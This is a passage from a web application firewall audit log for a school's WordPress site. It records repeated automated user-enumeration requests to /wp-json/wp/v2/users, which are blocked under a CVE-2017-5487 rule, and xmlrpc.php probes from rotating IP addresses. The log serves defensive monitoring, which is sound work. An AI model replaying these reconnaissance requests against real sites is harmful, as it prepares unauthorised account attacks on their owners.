Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746297778984814 5284 (- - -) Stopwatch2: 1746297778984814 5284; combined=3937, p1=551, p2=3173, p3=27, p4=26, p5=93, sr=118, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23147252-Z-- --8a2a4364-A-- [04/May/2025:01:45:24 +0700] aBZkRIOgvPi2IO4kz1sCDAAAAJU 103.236.140.4 50438 103.236.140.4 8181 --8a2a4364-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8a2a4364-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a2a4364-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746297924611356 3205 (- - -) Stopwatch2: 1746297924611356 3205; combined=1491, p1=462, p2=937, p3=0, p4=0, p5=91, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a2a4364-Z-- --786e5d62-A-- [04/May/2025:01:45:28 +0700] aBZkSIOgvPi2IO4kz1sCDgAAAJQ 103.236.140.4 50442 103.236.140.4 8181 --786e5d62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.7 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --786e5d62-C-- demo.sayHello --786e5d62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --786e5d62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746297928675323 5639 (- - -) Stopwatch2: 1746297928675323 5639; combined=4160, p1=584, p2=3417, p3=25, p4=23, p5=65, sr=116, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --786e5d62-Z-- --f3211104-A-- [04/May/2025:01:48:17 +0700] aBZk8YOgvPi2IO4kz1sCEgAAAJE 103.236.140.4 50458 103.236.140.4 8181 --f3211104-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f3211104-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3211104-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298097545038 3251 (- - -) Stopwatch2: 1746298097545038 3251; combined=1451, p1=542, p2=874, p3=0, p4=0, p5=35, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3211104-Z-- --aa1bab55-A-- [04/May/2025:01:48:20 +0700] aBZk9ESOhfQ6W15Bgg8RuAAAAEc 103.236.140.4 50460 103.236.140.4 8181 --aa1bab55-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aa1bab55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa1bab55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298100075117 2855 (- - -) Stopwatch2: 1746298100075117 2855; combined=1325, p1=451, p2=844, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa1bab55-Z-- --ca693446-A-- [04/May/2025:01:48:22 +0700] aBZk9ileQJs6d7wanHHU1AAAAM0 103.236.140.4 50466 103.236.140.4 8181 --ca693446-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.9 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ca693446-C-- demo.sayHello --ca693446-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca693446-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298102746208 5987 (- - -) Stopwatch2: 1746298102746208 5987; combined=4362, p1=565, p2=3574, p3=34, p4=35, p5=91, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca693446-Z-- --9d7a207c-A-- [04/May/2025:01:48:23 +0700] aBZk94OgvPi2IO4kz1sCEwAAAIA 103.236.140.4 50468 103.236.140.4 8181 --9d7a207c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.147 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9d7a207c-C-- demo.sayHello --9d7a207c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d7a207c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298103990452 4715 (- - -) Stopwatch2: 1746298103990452 4715; combined=3616, p1=442, p2=2980, p3=23, p4=25, p5=86, sr=75, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d7a207c-Z-- --5d530634-A-- [04/May/2025:01:49:14 +0700] aBZlKsP0ZqGY3Jj2X92cfgAAAAQ 103.236.140.4 50474 103.236.140.4 8181 --5d530634-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5d530634-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d530634-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298154101273 3211 (- - -) Stopwatch2: 1746298154101273 3211; combined=1403, p1=458, p2=915, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d530634-Z-- --d2c1f837-A-- [04/May/2025:01:49:17 +0700] aBZlLYOgvPi2IO4kz1sCFQAAAIM 103.236.140.4 50478 103.236.140.4 8181 --d2c1f837-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d2c1f837-C-- demo.sayHello --d2c1f837-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2c1f837-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298157412318 5255 (- - -) Stopwatch2: 1746298157412318 5255; combined=3922, p1=482, p2=3212, p3=23, p4=27, p5=102, sr=68, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2c1f837-Z-- --2999cb17-A-- [04/May/2025:01:49:28 +0700] aBZlOESOhfQ6W15Bgg8RvAAAAFY 103.236.140.4 50482 103.236.140.4 8181 --2999cb17-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2999cb17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2999cb17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298168579564 2992 (- - -) Stopwatch2: 1746298168579564 2992; combined=1261, p1=474, p2=760, p3=0, p4=0, p5=27, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2999cb17-Z-- --dcc2e057-A-- [04/May/2025:01:49:33 +0700] aBZlPcP0ZqGY3Jj2X92cgAAAABE 103.236.140.4 50486 103.236.140.4 8181 --dcc2e057-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.9 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dcc2e057-C-- demo.sayHello --dcc2e057-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dcc2e057-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298173007014 5822 (- - -) Stopwatch2: 1746298173007014 5822; combined=4240, p1=533, p2=3385, p3=116, p4=41, p5=96, sr=78, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dcc2e057-Z-- --b928f43c-A-- [04/May/2025:01:49:59 +0700] aBZlV4OgvPi2IO4kz1sCGAAAAIs 103.236.140.4 50502 103.236.140.4 8181 --b928f43c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b928f43c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b928f43c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298199489509 3024 (- - -) Stopwatch2: 1746298199489509 3024; combined=1311, p1=446, p2=835, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b928f43c-Z-- --1330ff0d-A-- [04/May/2025:01:50:02 +0700] aBZlWoOgvPi2IO4kz1sCGQAAAIo 103.236.140.4 50506 103.236.140.4 8181 --1330ff0d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1330ff0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1330ff0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298202619385 3174 (- - -) Stopwatch2: 1746298202619385 3174; combined=1328, p1=447, p2=841, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1330ff0d-Z-- --7e474a5e-A-- [04/May/2025:01:50:03 +0700] aBZlW0SOhfQ6W15Bgg8RwAAAAEw 103.236.140.4 50508 103.236.140.4 8181 --7e474a5e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7e474a5e-C-- demo.sayHello --7e474a5e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e474a5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298203319600 6037 (- - -) Stopwatch2: 1746298203319600 6037; combined=4479, p1=590, p2=3513, p3=34, p4=38, p5=168, sr=78, sw=136, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e474a5e-Z-- --f359c747-A-- [04/May/2025:01:50:04 +0700] aBZlXIOgvPi2IO4kz1sCGgAAAI4 103.236.140.4 50514 103.236.140.4 8181 --f359c747-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.182 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f359c747-C-- demo.sayHello --f359c747-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f359c747-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298204976618 4914 (- - -) Stopwatch2: 1746298204976618 4914; combined=3718, p1=439, p2=3064, p3=21, p4=24, p5=98, sr=66, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f359c747-Z-- --3b798373-A-- [04/May/2025:01:50:35 +0700] aBZle0SOhfQ6W15Bgg8RxQAAAFg 103.236.140.4 50520 103.236.140.4 8181 --3b798373-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b798373-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b798373-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298235273366 3455 (- - -) Stopwatch2: 1746298235273366 3455; combined=1372, p1=448, p2=891, p3=0, p4=0, p5=32, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b798373-Z-- --ea245122-A-- [04/May/2025:01:50:39 +0700] aBZlf0SOhfQ6W15Bgg8RxwAAAFQ 103.236.140.4 50524 103.236.140.4 8181 --ea245122-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ea245122-C-- demo.sayHello --ea245122-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea245122-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298239401193 6022 (- - -) Stopwatch2: 1746298239401193 6022; combined=4429, p1=581, p2=3619, p3=34, p4=37, p5=94, sr=79, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea245122-Z-- --32f6ae4e-A-- [04/May/2025:01:51:05 +0700] aBZlmYOgvPi2IO4kz1sCHAAAAI0 103.236.140.4 50528 103.236.140.4 8181 --32f6ae4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 